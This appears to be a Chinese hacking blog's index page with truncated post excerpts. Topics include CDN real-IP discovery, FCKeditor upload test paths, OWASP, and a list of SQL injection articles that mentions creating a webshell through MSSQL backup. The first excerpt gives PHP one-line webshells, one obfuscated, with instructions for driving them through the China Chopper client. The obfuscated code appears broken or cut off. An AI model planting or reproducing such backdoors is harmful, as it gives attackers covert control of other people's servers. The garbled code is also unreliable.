黑面小窝

第一种：1.php 在菜刀里写http://www.xxx.com /1.php?2=assert密码是1 第二种2.php $_="";$_[+""]='';$_="$_"."";$_=($_[+""]|"").($_[+""]|"").($_[+""]^"");?>在菜刀里写http://www.xxx.com/2.php?_=asser

现在很多网站用了cdn技术，在做一些测试的时候，想获取其服务器真实IP地址就有点困难，不知道现在还有其他什么好的方法呢，整理了下，目前知道如下两种：1：拿CDN服务器 找出真实IPcache_peer 1.1.1.1 parent 80 0 no-query originservercache_peer_domain 1.1.1.1 www.kanwangluo.com2：判断HT

原创文章转载自： Tueur Blog因为我经常逛一些国外编程网站，常用到翻译，chrome自带翻译很不错，但有时候只想翻译某个单词或某段话，用chrome自带的的全文翻译会很糟糕的把代码也翻译了，而且有时全文翻译后网页排版都乱了。我也找过一些插件，比如：”Halo Word Dictionary”，但翻译效果很不理想，且不支持句段翻译，坑爹的。昨儿个突然想起了以前看到的把默认

1.发现fckeditor目录存在，存在以下链接：FCKeditor/editor/filemanager/upload/test.htmlFCKeditor/editor/filemanager/browser/default/connectors/test.htmlFCKeditor/editor/filemanager/browser/default/browser.html?T

开放式Web应用程序安全项目（OWASP，Open Web Application Security Project）是一个组织，它提供有关计算机和互联网应用程序的公正、实际、有成本效益的信息。其目的是协助个人、企业和机构来发现和使用可信赖软件。　　开放式Web应用程序安全项目（OWASP）是一个非营利组织，不附属于任何企业或财团。因此，由OWASP提供和开发的所有设施和文件都不受商业因素的影

SQL注入天书 - ASP注入漏洞全接触(小竹) MSSQL 跨库查询(臭要饭的!黑夜) 榨干MS SQL最后一滴血 SQL语句参考及记录集对象详解 关于SQL Server中存储过程 利用 mssql backup 创建webshell SQL_Injection高级应用 跨站式SQL注入(老凯(laokai)) 怪异的SQL注入(

http://dl.dbank.com/c0abo9t4v4